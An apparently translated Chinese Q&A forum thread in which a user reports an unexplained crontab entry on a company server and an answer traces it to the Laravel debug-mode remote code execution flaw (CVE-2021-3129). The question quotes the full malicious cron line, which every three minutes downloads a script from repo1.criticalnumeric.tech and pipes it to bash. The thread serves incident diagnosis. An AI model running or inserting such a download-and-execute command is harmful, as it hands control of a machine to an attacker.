cron - 有人知道吗:repo1.criticalnumeric.tech
问题描述
我发现在公司服务器中有一个使用以下代码运行的 crontab:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
如果您访问该 URL,它会显示:
“这是存储库 linux 的官方页面”
这很奇怪,我们的工程师都没有在 crontab 上添加这个,这让我觉得这可能是一次攻击。
有什么想法吗?
解决方案
如果您的服务器正在托管使用Laravel框架构建的 Web 应用程序,并且您的调试模式已打开,那么您可能正在遭受最近的 RCE(远程代码执行)漏洞利用。
关于 bug 技术细节的博文:https ://www.ambionics.io/blog/laravel-debug-rce
CVE:https ://nvd.nist.gov/vuln/detail/CVE-2021-3129
我的专业建议:永远不要在生产环境中打开调试模式运行您的应用程序。
推荐阅读
- reactjs - React App 同时包含函数式和类组件
- javascript - JS从这个对象内的嵌套对象调用函数
- java - 如何为 java 类创建 HarnessTest 类?
- git - “git push”错误,位指定原点和分支工作
- javascript - 如何单独播放由 MediaRecorder 创建的 WEBM 文件
- python - 如何从 python 脚本执行 cd 命令并在新终端中执行附加命令?
- angular - 角度垫表:无法读取未定义的属性“地图”
- php - Laravel Horizon 不执行挂起的作业 - Kubernetes 和 Docker 环境
- json - Scala Circe JSON 库 - 在示例中理解隐式编码器
- php - 如何从 PHP 变量设置 Bing 地图图钉?